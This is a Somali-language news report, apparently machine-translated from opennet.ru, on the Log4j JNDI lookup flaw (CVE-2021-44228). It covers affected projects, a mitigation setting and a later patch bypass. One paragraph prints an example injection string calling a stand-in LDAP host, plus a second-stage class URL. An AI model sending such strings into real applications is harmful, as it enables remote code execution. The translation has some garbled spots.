Gudaha Apache Log4j, qaab-dhismeedka caanka ah ee abaabulka gelitaanka codsiyada Java, nuglaanta muhiimka ah ayaa la aqoonsaday taas oo u oggolaanaysa kood aan sabab lahayn in la fuliyo marka qiimaha gaarka ah ee qaabka "{jndi:URL}" lagu qoro log. Weerarka waxaa lagu qaadi karaa codsiyada Java kuwaas oo diiwaan geliya qiyamka laga helay ilo dibadda ah, tusaale ahaan, marka lagu soo bandhigo qiyamka dhibaatada leh ee fariimaha khaldan.
Waxaa la xusay in ku dhawaad ββdhammaan mashaariicda isticmaalaya qaab-dhismeedka sida Apache Struts, Apache Solr, Apache Druid ama Apache Flink ay saameeyeen dhibaatada, oo ay ku jiraan Steam, Apple iCloud, macaamiisha Minecraft iyo adeegayaasha. Waxaa la filayaa in nuglaanta ay u horseedi karto mowjado weeraro ah oo waaweyn oo lagu qaado codsiyada shirkadaha, dib u soo celinta taariikhda dayacanka halista ah ee qaab dhismeedka Apache Struts, kaas oo, marka loo eego qiyaasta qallafsan, loo isticmaalo codsiyada webka 65% of Fortune. 100 shirkadood oo ay ku jiraan isku dayada lagu baadho shabakadaha nidaamyada nugul.
Dhibaatada waxaa sii xumeeyay xaqiiqda ah in ka faa'iidaysi shaqo horay loo daabacay, laakiin hagaajinta laamaha xasilloon weli lama diyaarin. Aqoonsiga CVE weli lama magacaabin. Hagaajinta waxaa lagu daraa oo keliya qaybta imtixaanka log4j-2.15.0-rc1. Hawsha ka hortagga dayacanka, waxaa lagu talinayaa in loo dejiyo cabbirka log4j2.formatMsgNoLookups mid run ah.
Dhibaatadu waxay sababtay xaqiiqda ah in log4j uu taageeray habaynta waji-xidhka gaarka ah "{}" ee xariiqyada soo saarida log, kaas oo JNDI (Java Naming and Directory Interface) la fulin karo. Weerarku wuxuu hoos ugu dhacayaa gudbinta xadhig leh beddelka "${jndi:ldap://attacker.com/a}", marka la habeeyo taas log4j waxay u diri doontaa codsiga LDAP ee waddada fasalka Java ee server-ka weerarka.com . Waddada uu soo celiyay server-ka weeraryahanku (tusaale, http://second-stage.attacker.com/Exploit.class) ayaa la rari doonaa oo la fulin doonaa iyada oo la raacayo habka hadda socda, kaas oo u oggolaanaya weerarka inuu ku fuliyo kood kood aan sabab lahayn nidaamka leh xuquuqda codsiga hadda.
Kordhinta 1: Nuglaanta waxaa loo qoondeeyay aqoonsiga CVE-2021-44228.
Addendum 2: Habka looga gudbo ilaalinta lagu darey sii deynta log4j-2.15.0-rc1 ayaa la aqoonsaday. Cusbooneysiin cusub, log4j-2.15.0-rc2, ayaa la soo jeediyay iyadoo ilaalin buuxda oo ka dhan ah dayacanka. Koodhku wuxuu muujinayaa isbeddelka la xidhiidha maqnaanshaha joojinta aan caadiga ahayn ee kiiska isticmaalka URL JNDI oo si khaldan loo habeeyey.
Source: opennet.ru